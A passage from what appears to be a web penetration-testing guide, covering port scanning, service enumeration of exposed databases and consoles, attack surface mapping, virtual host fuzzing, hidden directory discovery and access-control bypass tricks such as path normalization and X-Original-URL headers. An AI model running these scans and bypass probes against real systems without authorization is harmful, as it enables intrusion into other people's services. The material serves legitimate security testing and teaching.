mkdir -p "$OUTDIR"

WORDLIST=/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

echo "=== Parameter Analysis: $ENDPOINT ==="

# Baseline response
echo "[1/4] Getting baseline..."
BASELINE_SIZE=$(curl -s "https://$TARGET$ENDPOINT" | wc -c)
BASELINE_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET$ENDPOINT")
echo "Baseline: $BASELINE_CODE ($BASELINE_SIZE bytes)"

# Test GET parameters
echo "[2/4] Testing GET parameters..."
while read param; do
  resp_size=$(curl -s "https://$TARGET${ENDPOINT}?${param}=test123" | wc -c)
  resp_code=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET${ENDPOINT}?${param}=test123")
  if [ "$resp_size" != "$BASELINE_SIZE" ] || [ "$resp_code" != "$BASELINE_CODE" ]; then
    echo "[+] Parameter affects response: $param (code=$resp_code, size=$resp_size)"
    echo "$param" >> "$OUTDIR/valid_params.txt"
  fi
done < "$WORDLIST"

# Test POST parameters
echo "[3/4] Testing POST parameters..."
while read param; do
  resp_size=$(curl -s -X POST "https://$TARGET$ENDPOINT" -d "${param}=test123" | wc -c)
  if [ "$resp_size" != "$BASELINE_SIZE" ]; then
    echo "[+] POST parameter affects response: $param (size=$resp_size)"
    echo "$param" >> "$OUTDIR/valid_post_params.txt"
  fi
done < "$WORDLIST"

# Test custom headers
echo "[4/4] Testing header parameters..."
for header in X-Forwarded-For X-Original-URL X-Rewrite-URL X-Debug X-Custom-IP-Authorization; do
  resp_size=$(curl -s -H "$header: 127.0.0.1" "https://$TARGET$ENDPOINT" | wc -c)
  if [ "$resp_size" != "$BASELINE_SIZE" ]; then
    echo "[+] Header affects response: $header (size=$resp_size)"
    echo "$header" >> "$OUTDIR/valid_headers.txt"
  fi
done

echo "[*] Results saved to $OUTDIR/"
Task 4
Port Scanning and Service Enumeration
1. Web-Focused Port Scanning
# Common web service ports
# 80    - HTTP
# 443   - HTTPS
# 8080  - HTTP alternate / proxy
# 8443  - HTTPS alternate
# 8000  - HTTP development
# 8888  - HTTP alternate
# 3000  - Node.js / Grafana
# 5000  - Flask / Docker Registry
# 9090  - Prometheus / various
# 9443  - HTTPS alternate
# 4443  - HTTPS alternate
# 2083  - cPanel HTTPS
# 2087  - WHM HTTPS
# 10000 - Webmin
# 7443  - various
# 8081  - HTTP alternate
# 8181  - HTTP alternate

# Non-web services often exposed alongside web apps
# 9200  - Elasticsearch
# 5601  - Kibana
# 27017 - MongoDB
# 6379  - Redis
# 11211 - Memcached
# 3306  - MySQL
# 5432  - PostgreSQL

# Quick web port scan
nmap -p 80,443,8080,8443,8000,8888,3000,5000,9090,9443 -sV --open target.com

# Full port scan
nmap -p- -sV --open -T4 target.com -oA full_scan

# Top 1000 ports with service detection and default scripts
nmap -sV -sC --open target.com -oA default_scan
2. Nmap Techniques for Web Services
# Version detection
nmap -sV -p 80,443 target.com

# Default scripts
nmap -sC -p 80,443 target.com

# Aggressive scan
nmap -A -p 80,443 target.com

# OS detection
nmap -O target.com

# Web-specific NSE scripts
nmap -p 80,443 --script http-title target.com
nmap -p 80,443 --script http-headers target.com
nmap -p 80,443 --script http-methods target.com
nmap -p 80,443 --script http-enum target.com
nmap -p 80,443 --script http-robots.txt target.com
nmap -p 80,443 --script http-git target.com
nmap -p 80,443 --script http-config-backup target.com
nmap -p 80,443 --script http-default-accounts target.com
nmap -p 443 --script ssl-enum-ciphers target.com
nmap -p 443 --script ssl-cert target.com
nmap -p 443 --script ssl-heartbleed target.com

# Vulnerability scanning
nmap -p 80,443 --script "http-vuln-*" target.com
nmap -p 443 --script "ssl-*" target.com

# All HTTP scripts
nmap -p 80 --script "http-*" target.com

# Scan multiple targets
nmap -iL targets.txt -p 80,443,8080,8443 -sV --open -oA multi_scan

# Speed tuning
nmap -T4 -p- --min-rate=1000 target.com    # fast
nmap -T5 -p- --min-rate=5000 target.com    # insane (may miss results)
nmap -T2 -p 80,443 target.com              # polite (slow, stealthy)

# Output formats
nmap -p 80,443 -sV target.com -oN normal.txt     # normal
nmap -p 80,443 -sV target.com -oX output.xml     # XML
nmap -p 80,443 -sV target.com -oG grep.txt       # grepable
nmap -p 80,443 -sV target.com -oA all_formats    # all formats
3. Masscan - Fast Port Scanning
# Scan all ports (very fast)
masscan -p1-65535 target.com --rate=1000 -oL masscan_results.txt

# Web ports only
masscan -p80,443,8080,8443,8000,3000,5000,9090 target.com --rate=500

# Scan an entire subnet
masscan -p80,443 10.0.0.0/24 --rate=1000 -oJ masscan.json

# Output formats
masscan -p80,443 target.com --rate=1000 -oL list.txt    # list
masscan -p80,443 target.com --rate=1000 -oJ json.txt    # JSON
masscan -p80,443 target.com --rate=1000 -oX xml.txt     # XML
masscan -p80,443 target.com --rate=1000 -oG grep.txt    # grepable

# Parse masscan results for nmap follow-up
grep "open" masscan_results.txt | awk '{print $4}' | sort -u > live_ips.txt
grep "open" masscan_results.txt | awk '{print $4":"$3}' | sed 's/\/tcp//' > ip_port_pairs.txt

# Follow up with nmap for detailed service info
nmap -iL live_ips.txt -sV -sC \
  -p $(grep "open" masscan_results.txt | awk '{print $3}' | sed 's/\/tcp//' | sort -u | tr '\n' ',')
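The awk parsing above assumes masscan's `-oL` record layout (state, protocol, port, IP, timestamp as whitespace-separated fields). A sketch against one sample line, useful for verifying the field positions before running a real scan:

```shell
# Convert masscan -oL records on stdin into ip:port pairs
masscan_to_pair() {
  awk '$1 == "open" {print $4 ":" $3}'
}

printf 'open tcp 8080 10.0.0.5 1700000000\n' | masscan_to_pair
# 10.0.0.5:8080
```

If a masscan version emits a different column order, this one-liner makes the mismatch obvious immediately.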
4. Service Fingerprinting
# Banner grabbing (herestrings don't interpret \r\n, so pipe printf into nc)
printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -v target.com 80
nc -v target.com 22
nc -v target.com 21

# Nmap service probes
nmap -sV --version-intensity 5 -p 80,443 target.com

# Custom service identification
curl -sI https://target.com | grep -iE "(Server|X-Powered|Via|X-Generator)"

# WhatWeb for detailed fingerprinting
whatweb -a 3 https://target.com

# Identify web server behind CDN
# Check for CDN indicator headers:
curl -sI https://target.com | grep -iE "(cf-ray|x-served-by|x-cache|x-amz|x-azure)"

# Direct origin access (bypass CDN) — --resolve keeps Host and SNI correct
curl -sI --resolve target.com:443:ORIGIN_IP https://target.com

# SSL certificate analysis
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | \
  openssl x509 -noout -subject -issuer -dates
5. Service-Specific Enumeration
# Elasticsearch (9200)
curl -s http://target.com:9200/
curl -s "http://target.com:9200/_cat/indices?v"
curl -s http://target.com:9200/_cluster/health
curl -s "http://target.com:9200/_search?q=*"

# Kibana (5601)
curl -s http://target.com:5601/api/status

# Redis (6379)
redis-cli -h target.com INFO
redis-cli -h target.com CONFIG GET '*'

# MongoDB (27017)
mongosh --host target.com --eval "db.adminCommand('listDatabases')"

# Docker Registry (5000)
curl -s http://target.com:5000/v2/_catalog
curl -s http://target.com:5000/v2/IMAGE/tags/list

# Jenkins (8080)
curl -s http://target.com:8080/api/json
curl -s http://target.com:8080/script   # Groovy console

# Grafana (3000)
curl -s http://target.com:3000/api/health
curl -s http://target.com:3000/api/datasources

# Prometheus (9090)
curl -s http://target.com:9090/api/v1/targets
curl -s http://target.com:9090/api/v1/label/__name__/values

# Consul (8500)
curl -s http://target.com:8500/v1/catalog/services
curl -s "http://target.com:8500/v1/kv/?recurse"

# etcd (2379)
curl -s "http://target.com:2379/v2/keys/?recursive=true"
6. HTTP/HTTPS Service Analysis
# httpx - HTTP toolkit
echo target.com | httpx -ports 80,443,8080,8443,8000,3000,5000,9090 \
  -status-code -title -tech-detect -web-server -content-length \
  -follow-redirects -silent

# Scan multiple hosts
cat hosts.txt | httpx -ports 80,443,8080,8443 -status-code -title -silent -o httpx_results.txt

# Detailed probe
httpx -l hosts.txt -status-code -title -tech-detect -web-server \
  -content-length -content-type -cdn -ip -cname -tls-grab \
  -favicon -jarm -hash sha256 -o detailed_httpx.txt

# Filter results
grep "200" httpx_results.txt > alive_200.txt
grep -E "401|403" httpx_results.txt > auth_required.txt
grep -iE "admin|panel|dashboard" httpx_results.txt > admin_panels.txt

# JARM fingerprinting (TLS fingerprint)
httpx -l hosts.txt -jarm -o jarm_results.txt
# Compare JARM hashes to identify similar servers
7. SSL/TLS Analysis
# testssl.sh - comprehensive SSL/TLS test
testssl.sh target.com
testssl.sh --full target.com
testssl.sh --vulnerable target.com
testssl.sh -U target.com   # vulnerabilities only

# sslscan
sslscan target.com

# sslyze
sslyze target.com
sslyze --regular target.com

# OpenSSL manual tests
# Check TLS versions (</dev/null stops s_client from waiting on stdin)
openssl s_client -connect target.com:443 -tls1   </dev/null >/dev/null 2>&1 && echo "TLS 1.0 supported"
openssl s_client -connect target.com:443 -tls1_1 </dev/null >/dev/null 2>&1 && echo "TLS 1.1 supported"
openssl s_client -connect target.com:443 -tls1_2 </dev/null >/dev/null 2>&1 && echo "TLS 1.2 supported"
openssl s_client -connect target.com:443 -tls1_3 </dev/null >/dev/null 2>&1 && echo "TLS 1.3 supported"

# Check for weak ciphers
nmap -p 443 --script ssl-enum-ciphers target.com

# Certificate details
echo | openssl s_client -connect target.com:443 2>/dev/null | \
  openssl x509 -noout -text | grep -A 2 "Subject\|Issuer\|Not After\|DNS:"

# Check for Heartbleed
nmap -p 443 --script ssl-heartbleed target.com

# POODLE check
nmap -p 443 --script ssl-poodle target.com
8. UDP Service Discovery
# UDP scan (slower than TCP)
nmap -sU -p 53,161,500,4500,1900 target.com

# Common UDP services on web infrastructure:
# 53   - DNS
# 161  - SNMP
# 500  - IKE (VPN)
# 4500 - IPsec NAT-T
# 1900 - SSDP/UPnP
# 123  - NTP
# 514  - Syslog
# 69   - TFTP

# SNMP enumeration
snmpwalk -v2c -c public target.com

# NTP info
ntpq -c readvar target.com
9. Network Mapping
# Traceroute to target
traceroute target.com
traceroute -T -p 443 target.com   # TCP traceroute

# Identify network boundaries
# CDN → Load Balancer → Web Server → Application Server → Database

# Detect load balancers
# Multiple requests to see different server IDs
for i in $(seq 1 10); do
  curl -sI https://target.com | grep -iE "(Server|X-Served|X-Backend|X-Cache)"
done

# lbd - load balancer detection
lbd target.com

# halberd
halberd target.com

# Detect reverse proxy
# Signs: Via header, X-Forwarded-For processing, different error pages
curl -sI https://target.com | grep -i "via"
Task 5
Application Mapping and Attack Surface
1. Application Architecture Mapping
Application Map:
├── Entry Points
│   ├── Public pages (/, /about, /contact)
│   ├── Authentication (login, register, forgot-password)
│   ├── API endpoints (/api/v1/*)
│   ├── File uploads (/upload, /import)
│   └── WebSocket connections (ws://...)
├── User Roles
│   ├── Anonymous
│   ├── Authenticated User
│   ├── Premium User
│   ├── Moderator
│   └── Administrator
├── Data Flows
│   ├── User input → Processing → Storage → Output
│   ├── Authentication flow
│   ├── Payment flow
│   └── File handling flow
└── Trust Boundaries
    ├── Client ↔ Server
    ├── Web Server ↔ Application Server
    ├── Application ↔ Database
    └── Internal ↔ External services
2. Entry Point Identification
# Identify all entry points from crawl data

# Forms
curl -s https://target.com | grep -oP '<form[^>]*action="[^"]*"' | sort -u

# Input fields
curl -s https://target.com | grep -oP '<input[^>]*name="[^"]*"' | sort -u

# URL parameters
cat all_urls.txt | grep "?" | grep -oP '[?&]([^=]+)=' | sort | uniq -c | sort -rn

# API endpoints
cat all_urls.txt | grep -iE "/api/" | sort -u

# File upload forms
curl -s https://target.com | grep -iP 'type="file"|enctype="multipart'

# JavaScript event handlers
curl -s https://target.com | grep -oP 'on(click|submit|change|load|error)="[^"]*"' | sort -u

# WebSocket endpoints
curl -s https://target.com | grep -oiP '(wss?://[^\s"'"'"']+)'

# Classify entry points by risk:
# HIGH:   File upload, payment processing, authentication, admin functions
# MEDIUM: Search, user profile, comments, settings
# LOW:    Static pages, public content, help pages
3. Functionality Mapping
# Map each function of the application:

# Authentication Functions
[ ] Login (username/password)
[ ] Login (social OAuth)
[ ] Registration
[ ] Password reset
[ ] Email verification
[ ] Two-factor authentication
[ ] Session management
[ ] Logout
[ ] Remember me
[ ] Account lockout

# User Management
[ ] Profile view/edit
[ ] Avatar/photo upload
[ ] Email change
[ ] Password change
[ ] Account deletion
[ ] User search
[ ] User listing

# Content Functions
[ ] Create content (posts, comments, reviews)
[ ] Edit content
[ ] Delete content
[ ] Upload files
[ ] Download files
[ ] Search content
[ ] Share content
[ ] Export data

# Administrative Functions
[ ] User management
[ ] Content moderation
[ ] System configuration
[ ] Log viewing
[ ] Backup/restore
[ ] API key management
[ ] Role/permission management

# API Functions
[ ] CRUD operations
[ ] Bulk operations
[ ] Export/import
[ ] Webhooks
[ ] Rate-limited endpoints
[ ] Public vs authenticated endpoints
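The checklist above can live in a plain text file and be tallied as testing progresses — a minimal sketch, assuming the `[ ]`/`[x]` convention used above (the file path is illustrative):

```shell
# Track coverage of the functionality checklist kept in a text file.
# Assumes each function is a line starting with "[ ]" (untested) or "[x]" (tested).
checklist_progress() {
  local checked total
  checked=$(grep -c '^\[x\]' "$1")
  total=$(grep -c '^\[.\]' "$1")
  echo "$checked/$total functions tested"
}

# Demo on a sample checklist
cat > /tmp/functions.txt <<'EOF'
[x] Login (username/password)
[ ] Registration
[x] Password reset
EOF
checklist_progress /tmp/functions.txt   # → 2/3 functions tested
```

Marking lines `[x]` as each function is exercised keeps the role matrix and report sections honest about what was actually covered.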
4. Role-Based Access Mapping
# Test each functionality with different user roles
# Create role matrix:
# | Function          | Anonymous | User | Premium | Admin |
# |-------------------|-----------|------|---------|-------|
# | View public       | Y         | Y    | Y       | Y     |
# | View profile      | N         | Own  | Own     | All   |
# | Edit profile      | N         | Own  | Own     | All   |
# | Delete user       | N         | N    | N       | Y     |
# | Admin panel       | N         | N    | N       | Y     |
# | API access        | Limited   | Y    | Y       | Y     |
# | File upload       | N         | Y    | Y       | Y     |
# | Export data       | N         | N    | Y       | Y     |

# Automated role comparison
# Login as each role and crawl
for role in anonymous user premium admin; do
  case $role in
    anonymous) katana -u https://target.com -d 5 -jc -silent > crawl_${role}.txt ;;
    user)      katana -u https://target.com -H "Cookie: $USER_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;;
    premium)   katana -u https://target.com -H "Cookie: $PREMIUM_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;;
    admin)     katana -u https://target.com -H "Cookie: $ADMIN_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;;
  esac
done

# Compare and find role-specific pages
comm -23 <(sort crawl_admin.txt) <(sort crawl_user.txt) > admin_only.txt
comm -23 <(sort crawl_user.txt) <(sort crawl_anonymous.txt) > auth_required.txt
5. Data Flow Analysis
# Track how data flows through the application
# Input → Processing → Storage → Output
# Each step is a potential vulnerability point:

# Input stage:
# - What data does the application accept?
# - What format (text, JSON, XML, file)?
# - Client-side validation (can be bypassed)
# - Server-side validation (what's checked?)

# Processing stage:
# - How is input processed?
# - Is it passed to interpreters (SQL, OS, template engine)?
# - Is it serialized/deserialized?
# - Is it used in file operations?

# Storage stage:
# - Where is data stored (database, file system, cache)?
# - Is it encrypted?
# - Is it sanitized before storage?

# Output stage:
# - Where is data displayed?
# - Is output encoding applied?
# - Is it reflected in HTTP headers?
# - Is it included in emails/notifications?

# Example data flow for a search function:
# User input (search query)
#   → GET /search?q=<user_input>
#   → Server processes query
#   → Database query: SELECT * FROM items WHERE name LIKE '%<input>%'
#   → Results rendered in HTML: <h2>Results for: <input></h2>
#
# Vulnerabilities at each stage:
# Input:      No validation → accept malicious payloads
# Processing: SQL concatenation → SQL injection
# Output:     No encoding → Reflected XSS
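The output-stage fix for the search example above (encode before reflecting) can be sketched in shell — illustrative only; a real application should rely on its template engine's context-aware auto-escaping rather than a hand-rolled escaper:

```shell
# Output-stage encoding for the search example: escape HTML metacharacters
# before reflecting user input into the page. The '&' substitution must run
# first so already-escaped entities are not double-mangled.
html_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' \
                         -e 's/>/\&gt;/g' -e 's/"/\&quot;/g'
}

q='<script>alert(1)</script>'
printf '<h2>Results for: %s</h2>\n' "$(html_escape "$q")"
# → <h2>Results for: &lt;script&gt;alert(1)&lt;/script&gt;</h2>
# The payload is rendered as inert text instead of executing.
```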
6. Third-Party Integration Mapping
# Identify third-party services and integrations

# Payment processors
curl -s https://target.com | grep -ioE "(stripe|paypal|braintree|square|adyen|klarna)"

# Analytics
curl -s https://target.com | grep -ioE "(google-analytics|gtag|ga\(|fbq\(|_paq|analytics)"

# CDN/hosting
curl -sI https://target.com | grep -iE "(cloudflare|akamai|cloudfront|fastly|incapsula)"

# Authentication providers
curl -s https://target.com | grep -ioE "(oauth|openid|saml|auth0|okta|firebase)"

# Social media
curl -s https://target.com | grep -ioE "(facebook|twitter|instagram|linkedin|github).com"

# Chat/communication
curl -s https://target.com | grep -ioE "(intercom|zendesk|freshdesk|drift|crisp|tawk)"

# Email services
curl -s https://target.com | grep -ioE "(mailgun|sendgrid|mailchimp|ses\.amazonaws)"

# Storage
curl -s https://target.com | grep -ioE "(s3\.amazonaws|storage\.googleapis|blob\.core\.windows)"

# Each integration is a potential attack vector:
# - OAuth misconfiguration → account takeover
# - S3 bucket misconfiguration → data exposure
# - Webhook endpoints → SSRF
# - Third-party JS → supply chain attack
7. Error Handling Analysis
# Trigger different error conditions

# 404 - Not Found
curl -s https://target.com/nonexistent12345
# Look for: framework info, stack traces, debug info

# 500 - Internal Server Error
curl -s "https://target.com/page?id=1'"
curl -s -X POST https://target.com/api/endpoint -d '{invalid json'
# Look for: stack traces, database errors, internal paths

# 400 - Bad Request
curl -s -H "Content-Type: invalid" https://target.com
# Look for: framework-specific error page

# 405 - Method Not Allowed
curl -s -X DELETE https://target.com/
# Look for: allowed methods

# 413 - Request Entity Too Large
python3 -c "print('A'*10000000)" | curl -s -X POST -d @- https://target.com

# 414 - URI Too Long
curl -s "https://target.com/$(python3 -c "print('A'*10000)")"

# Test common error-triggering inputs
PAYLOADS="' \" ; -- /* */ () [] {} <> \\ %00 %0a null undefined NaN Infinity"
for payload in $PAYLOADS; do
  echo "[*] Testing: $payload"
  curl -s "https://target.com/search?q=$payload" -o /dev/null -w "%{http_code}\n"
done
8. Security Headers Analysis
# Check security headers
curl -sI https://target.com | grep -iE "^(strict-transport|content-security|x-frame|x-content|x-xss|referrer-policy|permissions-policy|cross-origin|feature-policy)"

# Security headers checklist:
# Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
# Content-Security-Policy: default-src 'self'; script-src 'self'
# X-Frame-Options: DENY or SAMEORIGIN
# X-Content-Type-Options: nosniff
# X-XSS-Protection: 0 (or omitted - CSP preferred)
# Referrer-Policy: strict-origin-when-cross-origin
# Permissions-Policy: camera=(), microphone=(), geolocation=()
# Cross-Origin-Opener-Policy: same-origin
# Cross-Origin-Embedder-Policy: require-corp
# Cross-Origin-Resource-Policy: same-origin

# Automated header check
python3 << 'PYEOF'
import requests
import urllib3

urllib3.disable_warnings()  # suppress the verify=False warning

url = "https://target.com"
r = requests.get(url, verify=False)
headers = r.headers

security_headers = {
    'Strict-Transport-Security': 'max-age=',
    'Content-Security-Policy': None,
    'X-Frame-Options': None,
    'X-Content-Type-Options': 'nosniff',
    'Referrer-Policy': None,
    'Permissions-Policy': None,
}

for header, expected in security_headers.items():
    value = headers.get(header)
    if value:
        print(f"[+] {header}: {value}")
    else:
        print(f"[-] MISSING: {header}")
PYEOF

# securityheaders.com (scrapes the public report page)
curl -s "https://securityheaders.com/?q=target.com&followRedirects=on" | head -50
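When repeated requests against the target are undesirable, the same check can run offline against a saved header dump — a sketch assuming the headers were captured once with `curl -sI` (the file names are illustrative):

```shell
# Offline security-header audit: grade a saved response-header dump instead
# of re-requesting the target. Capture once with:
#   curl -sI https://target.com -o headers.txt
check_headers() {
  local file=$1
  for h in Strict-Transport-Security Content-Security-Policy \
           X-Frame-Options X-Content-Type-Options \
           Referrer-Policy Permissions-Policy; do
    if grep -qi "^${h}:" "$file"; then
      echo "[+] $h: $(grep -i "^${h}:" "$file" | head -1 | cut -d: -f2- | sed 's/^ //')"
    else
      echo "[-] MISSING: $h"
    fi
  done
}

# Demo on a sample capture
cat > /tmp/headers_sample.txt <<'EOF'
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
EOF
check_headers /tmp/headers_sample.txt
```

Keeping the dump alongside the report also preserves evidence of the header state at test time.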
9. Attack Surface Summary Document
# Attack Surface Analysis: target.com

## Application Overview
- Type: E-commerce web application
- Stack: React frontend, Node.js/Express backend, PostgreSQL database
- Hosting: AWS (us-east-1), CloudFront CDN
- WAF: Cloudflare

## Authentication
- Login: Email/password + Google OAuth
- Session: JWT in httpOnly cookie
- MFA: Optional TOTP
- Password reset: Email-based token

## Entry Points (High Risk)
1. POST /api/auth/login - Authentication
2. POST /api/auth/register - Registration
3. POST /api/upload - File upload (images)
4. POST /api/checkout - Payment processing
5. GET /api/users/:id - User profile (IDOR potential)
6. PUT /api/users/:id - Profile update (mass assignment)
7. GET /search?q= - Search (XSS/SQLi potential)
8. POST /api/reviews - User-generated content (stored XSS)

## API Endpoints
- REST API: /api/v1/* (authenticated)
- GraphQL: /graphql (authenticated, introspection enabled)
- WebSocket: wss://target.com/ws (notifications)

## User Roles
1. Anonymous - public pages only
2. User - CRUD own data, purchase
3. Seller - product management
4. Admin - full access, user management

## Third-Party Integrations
- Stripe (payments)
- AWS S3 (file storage)
- SendGrid (email)
- Google OAuth (authentication)
- Cloudflare (CDN/WAF)

## Missing Security Headers
- Content-Security-Policy
- Permissions-Policy
- Cross-Origin-Opener-Policy

## Known Technologies
- Node.js 18.x, Express 4.18
- React 18.2, Next.js 14
- PostgreSQL 15
- Redis 7 (caching)
- nginx 1.24 (reverse proxy)
10. Attack Surface Scoring
# Rate each entry point:
# Risk = Likelihood × Impact

# Likelihood factors:
# - Publicly accessible? (Higher)
# - Requires authentication? (Lower)
# - Complex input handling? (Higher)
# - Known vulnerability pattern? (Higher)

# Impact factors:
# - Data sensitivity (PII, financial, health)
# - Business criticality
# - Lateral movement potential
# - Regulatory implications

# Priority Matrix:
# | Entry Point    | Likelihood | Impact   | Priority |
# |----------------|------------|----------|----------|
# | File upload    | High       | Critical | P1       |
# | Search (XSS)   | High       | Medium   | P2       |
# | API auth       | Medium     | Critical | P1       |
# | User profile   | Medium     | High     | P2       |
# | Password reset | Medium     | High     | P2       |
# | Comments       | High       | Medium   | P2       |
# | Static pages   | Low        | Low      | P4       |

# Test in order: P1 → P2 → P3 → P4
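The Likelihood × Impact scheme can be mechanized with a small helper — a sketch assuming a simple 1-4 numeric scale and arbitrary thresholds, not a formal scoring methodology:

```shell
# Map likelihood × impact (1=Low 2=Medium 3=High 4=Critical) to a test
# priority. Scale and thresholds are illustrative assumptions.
priority() {
  local score=$(( $1 * $2 ))
  if   [ "$score" -ge 9 ]; then echo P1
  elif [ "$score" -ge 6 ]; then echo P2
  elif [ "$score" -ge 3 ]; then echo P3
  else                          echo P4
  fi
}

# Demo: entrypoint,likelihood,impact (hypothetical values)
cat > /tmp/surface.csv <<'EOF'
file_upload,3,4
search_xss,3,2
static_pages,1,1
EOF

while IFS=, read -r name l i; do
  printf '%-15s %s\n' "$name" "$(priority "$l" "$i")"
done < /tmp/surface.csv
```

Scoring from a CSV keeps the priority column reproducible when likelihood or impact estimates are revised mid-engagement.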
Task 6
Virtual Host and Hidden Endpoint Recon
1. Virtual Host (VHost) Concepts
A single IP can host multiple websites via virtual hosts:

Request to 93.184.216.34 with Host: app1.target.com     → App 1 content
Request to 93.184.216.34 with Host: app2.target.com     → App 2 content
Request to 93.184.216.34 with Host: admin.target.com    → Admin panel
Request to 93.184.216.34 with Host: internal.target.com → Internal app

VHosts not in DNS are invisible to standard subdomain enumeration. They are only discoverable by fuzzing the Host header.
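Because a miss returns the catch-all (default) vhost, discovery reduces to comparing each candidate's response against a deliberately bogus Host baseline — a minimal sketch in which the comparison logic is pure and the curl lines that would feed it are shown commented out (the 10% size threshold is an arbitrary assumption):

```shell
# VHost hits are spotted by deviation from the default (catch-all) response.
# Feed the function with body sizes captured like this:
#   baseline=$(curl -s -H "Host: nonexistent.target.com" http://TARGET_IP | wc -c)
#   candidate=$(curl -s -H "Host: admin.target.com" http://TARGET_IP | wc -c)

differs_from_baseline() {
  # Flag a candidate whose body size deviates more than 10% from baseline.
  local base=$1 cand=$2
  local delta=$(( cand > base ? cand - base : base - cand ))
  [ $(( delta * 10 )) -gt "$base" ]
}

# Demo with hypothetical sizes
if differs_from_baseline 5120 9300; then echo "likely distinct vhost"; fi
if differs_from_baseline 5120 5121; then :; else echo "same as default"; fi
```

Size comparison is cruder than ffuf's auto-calibration (`-ac`) but makes the filtering decision explicit and auditable.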
2. VHost Fuzzing Techniques
# ffuf vhost discovery
ffuf -u http://TARGET_IP -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -mc all -ac

# With HTTPS
ffuf -u https://TARGET_IP -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -mc all -ac -k

# Filter by size (exclude default response)
DEFAULT_SIZE=$(curl -s -H "Host: nonexistent.target.com" http://TARGET_IP | wc -c)
ffuf -u http://TARGET_IP -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs $DEFAULT_SIZE

# gobuster vhost mode
gobuster vhost -u http://TARGET_IP \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain -t 50

# Manual testing
for sub in admin dev staging test internal api portal git jenkins jira wiki; do
  size=$(curl -s -H "Host: ${sub}.target.com" http://TARGET_IP | wc -c)
  code=$(curl -s -o /dev/null -w "%{http_code}" -H "Host: ${sub}.target.com" http://TARGET_IP)
  echo "$code ${size}bytes ${sub}.target.com"
done
3. Hidden Directory Discovery
# Common hidden/sensitive directories
# Framework notes: _profiler/_wdt = Symfony profiler; console/__console = Flask/Werkzeug;
# elmah.axd/trace.axd = ASP.NET; actuator/* = Spring Boot; rails/info = Rails;
# wp-json = WordPress REST API
HIDDEN_DIRS=".git .svn .hg .bzr _darcs
.well-known .well-known/security.txt .well-known/openid-configuration
server-status server-info
__debug__ _debug debug _debugbar
_profiler _wdt
console __console
elmah.axd trace.axd
actuator actuator/health actuator/env actuator/mappings
rails/info rails/info/routes
wp-json wp-json/wp/v2
cgi-bin fcgi-bin
tmp temp cache
backup backups old archive legacy
test tests testing dev development stage staging
private internal restricted
api/internal api/debug api/admin
graphql graphiql
phpmyadmin pma phpMyAdmin adminer"

for dir in $HIDDEN_DIRS; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$dir" 2>/dev/null)
  if [ "$code" != "404" ] && [ "$code" != "000" ]; then
    echo "[+] /$dir → $code"
  fi
done

# Technology-specific paths
# IIS:      /iishelp, /iisadmin, /_vti_bin, /_vti_inf.html
# Apache:   /server-status, /server-info, /.htaccess
# Nginx:    /nginx_status, /nginx.conf
# Tomcat:   /manager/html, /host-manager/html, /status
# JBoss:    /jmx-console, /web-console, /invoker/JMXInvokerServlet
# WebLogic: /console, /wls-wsat, /bea_wls_internal
4. Path Normalization Bypass
# WAF/auth bypass via path normalization
URL="https://target.com/admin"

# URL encoding and double encoding
curl -s "https://target.com/%61%64%6d%69%6e"           # single-encoded "admin"
curl -s "https://target.com/%2561%2564%256d%2569%256e" # double-encoded

# Path traversal normalization
curl -s "https://target.com/./admin"
curl -s "https://target.com//admin"
curl -s "https://target.com/admin/"
curl -s "https://target.com/admin/."
curl -s "https://target.com/;/admin"
curl -s "https://target.com/.;/admin"
curl -s "https://target.com/admin;/"
curl -s "https://target.com/ADMIN"
curl -s "https://target.com/Admin"
curl -s "https://target.com/admin..;/"

# Using X-Original-URL / X-Rewrite-URL headers (Nginx/IIS)
curl -s -H "X-Original-URL: /admin" https://target.com/
curl -s -H "X-Rewrite-URL: /admin" https://target.com/

# Using X-Forwarded-Prefix
curl -s -H "X-Forwarded-Prefix: /admin" https://target.com/

# Nginx off-by-slash
curl -s "https://target.com/assets../admin"

# Method override
curl -s -X POST -H "X-HTTP-Method-Override: GET" https://target.com/admin
5. HTTP Method Discovery
# Test all HTTP methods on endpoints
ENDPOINT="https://target.com/api/users"

for method in GET POST PUT DELETE PATCH HEAD OPTIONS TRACE CONNECT; do
  code=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$ENDPOINT" 2>/dev/null)
  echo "$method → $code"
done

# OPTIONS request reveals allowed methods
curl -s -X OPTIONS -I "$ENDPOINT" | grep -i "allow"

# TRACE method (potential XST - Cross-Site Tracing)
curl -s -X TRACE "$ENDPOINT"

# Method override headers
curl -s -X POST -H "X-HTTP-Method-Override: PUT" "$ENDPOINT" -d '{"test":1}'
curl -s -X POST -H "X-Method-Override: DELETE" "$ENDPOINT"
curl -s -X POST -H "X-HTTP-Method: PATCH" "$ENDPOINT" -d '{"test":1}'

# Nmap HTTP methods
nmap --script http-methods -p 80,443 target.com
6. Forced Browsing / Direct Object Access
# Access resources directly without following links

# Common admin paths
ADMIN_PATHS="/admin /administrator /admin/login /admin/dashboard
/manage /management /manager /portal /dashboard
/control-panel /cpanel
/admin.php /admin.html /admin.asp /admin.jsp
/wp-admin /wp-login.php /user/login /auth/login
/backoffice /backend /sysadmin /superadmin"

for path in $ADMIN_PATHS; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null)
  if [ "$code" != "404" ]; then
    echo "[+] $path → $code"
  fi
done

# Predictable resource locations
# /user/1, /user/2, /user/3 (IDOR enumeration)
